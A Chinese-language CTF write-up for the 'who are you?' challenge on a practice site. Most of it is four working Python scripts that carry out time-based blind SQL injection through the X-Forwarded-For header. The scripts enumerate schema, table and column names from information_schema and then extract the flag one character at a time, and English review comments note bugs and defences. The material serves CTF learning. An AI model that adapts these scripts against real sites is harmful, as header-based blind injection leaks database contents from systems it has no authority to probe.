who are you?
這道題點開看見your ip is :xxx.xxx.xx.xxx
然後試了巨久改ip,改了一堆了還是啥都沒有
然後看了大佬的wp,說是時間盲注,試了一下,確實有延遲,然後就用腳本進行時間盲注了
爆數據庫
#-*-coding:utf-8-*-
# Brute-force the database (schema) names.
#
# Time-based blind SQL injection probe against the CTF practice endpoint
# named in the write-up above. Each request carries one guess in the
# X-Forwarded-For header; when the guessed character matches, the injected
# CASE branch calls sleep(5), which exceeds the 4 s client timeout, so a
# timed-out request is read as "this character is correct".
# NOTE(review): the server side is not shown here; presumably it interpolates
# this header into a query without parameterisation (the "your ip is" banner
# mentioned above) — a prepared statement on that query would close the
# channel, and a burst of header requests that each take ~5 s is the
# server-side signal to look for.
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidate alphabet for one character of a name.
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
database = []
print('start.')
for database_number in range(0,100): # enumerate the first 100 schemas
    database_name =''
    for i in range(1,100): # name length capped at 100 characters
        flag = 0
        for str in guess: # try every candidate at this position (shadows builtin str)
            headers = {
                "X-Forwarded-For":"'+"+"(select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)
            }
            try:
                # `res` is never used: only the timeout matters.
                res = requests.get(url,headers=headers,timeout=4)
            except:
                # A timeout is the expected exception, but a bare except also
                # swallows connection errors, DNS failures and KeyboardInterrupt,
                # each of which is then recorded as a hit (the last script in
                # this write-up narrows this to ReadTimeout).
                database_name+=str
                flag = 1
                print('scaning no.%d database.'%(database_number+1),database_name)
                break
        if flag==0:
            # No candidate matched at this position: the name is complete.
            break
    # Appended before the end-of-list check, so the final entry is ''.
    database.append(database_name)
    if i==1 and flag==0:
        # Nothing matched even at position 1: no schema at this offset.
        print('finished.')
        break
for i in range(len(database)):
    print(database[i])
然後就能看到有什麼數據庫了
爆數據表
這裏前面是爆了43個數據庫,然後我們猜測是在最後一個數據庫
貼波腳本
#-*- coding:utf-8-*-
# Brute-force the table names.
#
# Same time-based blind probe as the schema script above, this time reading
# information_schema.TABLES at offsets 41..42 (the write-up guesses the
# interesting table is near the end). A guess is confirmed when the injected
# sleep(5) pushes the request past the 4 s client timeout.
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidate alphabet for one character of a name.
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
tables = []
print('start')
for table_number in range(41,43):
    tablename = ""
    for i in range(1,100): # name length capped at 100 characters
        flag = 0
        for str in guess: # try every candidate at this position (shadows builtin str)
            headers={
                "X-Forwarded-For":"'+"+"(select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)
            }
            try:
                # `res` is never used: only the timeout matters.
                res = requests.get(url,headers=headers,timeout=4)
            except:
                # Bare except: any failure (not only a timeout) counts as a hit.
                tablename+=str
                flag=1
                # The message still says 'database'; the value is a table name.
                print('scaning no.%d database '%(table_number+1),tablename)
                break
        if flag==0:
            # No candidate matched at this position: the name is complete.
            break
    # Appended before the end-of-list check, so an empty name is kept too.
    tables.append(tablename)
    if i==1 and flag==0:
        # Nothing matched even at position 1: no table at this offset.
        print('finished.')
        break
for i in range(len(tables)):
    print(tables[i])
就可以看見最後一個數據庫裏面有個flag表
接着爆字段,這個也是前面掃了一下有485個列,也是去掃一下最後一列
# -*- coding:utf-8 -*-
# Brute-force the column names.
#
# Same time-based blind probe, reading information_schema.COLUMNS; only
# offset 484 (the last of the 485 columns counted in the write-up) is
# scanned. A guess is confirmed when the injected sleep(5) pushes the
# request past the 4 s client timeout.
import requests
import string
url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Candidate alphabet for one character of a name.
guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation
columns=[]
for column_number in range(484,485): # only the last column
    cloumnname=''  # (sic) the column name being assembled
    for i in range(1,100): # name length capped at 100 characters
        flag=0
        for str in guess: # try every candidate at this position (shadows builtin str)
            headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}
            try:
                # `res` is never used: only the timeout matters.
                res=requests.get(url,headers=headers,timeout=4)
            except:
                # Bare except: any failure (not only a timeout) counts as a hit.
                cloumnname+=str
                flag=1
                print('scaning the no.%d column '%(column_number+1) ,cloumnname)
                break
        if flag==0:
            # No candidate matched at this position: the name is complete.
            break
    # Appended before the end-of-list check, so an empty name is kept too.
    columns.append(cloumnname)
    if i==1 and flag==0:
        # Nothing matched even at position 1: no column at this offset.
        print('finished.')
        break
for i in range(len(columns)):
    print(columns[i])
可以看到最後一列是有flag的,最後就是暴力出它的值就行了
#-*-coding:utf-8-*-
# Read the flag value character by character.
#
# Same time-based blind probe as the three scripts above, now with a longer
# sleep(7) against a 6 s client timeout, and — unlike the earlier scripts —
# only requests.exceptions.ReadTimeout is treated as a hit, so connection
# errors no longer produce false characters.
import requests
import string
url="http://ctf5.shiyanbar.com/web/wonderkun/index.php"
# Alphabet is alphanumeric only here (no punctuation).
guess=string.ascii_lowercase + string.ascii_uppercase + string.digits
flag=""
for i in range(1,100): # value length capped at 100 characters
    biaoji=0  # "marker": set to 1 once a character matched at this position
    for str in guess: # try every candidate at this position (shadows builtin str)
        headers={"X-forwarded-for":"' +(select case when (substring((select flag from flag ) from %d for 1 )='%s') then sleep(7) else 1 end ) and '1'='1" %(i,str)}
        try:
            # `res` is never used: only the timeout matters.
            res=requests.get(url,headers=headers,timeout=6)
        except(requests.exceptions.ReadTimeout):
            biaoji=1
            flag = flag + str
            print( "flag:", flag)
            break
    if biaoji==0:
        # No candidate matched at this position: the value is complete.
        break
print( 'result:' + flag)
這樣就出來flag了
這個掃出來是真的慢,等到我從一條鹹魚都發黴變成了黴香鹹魚了...............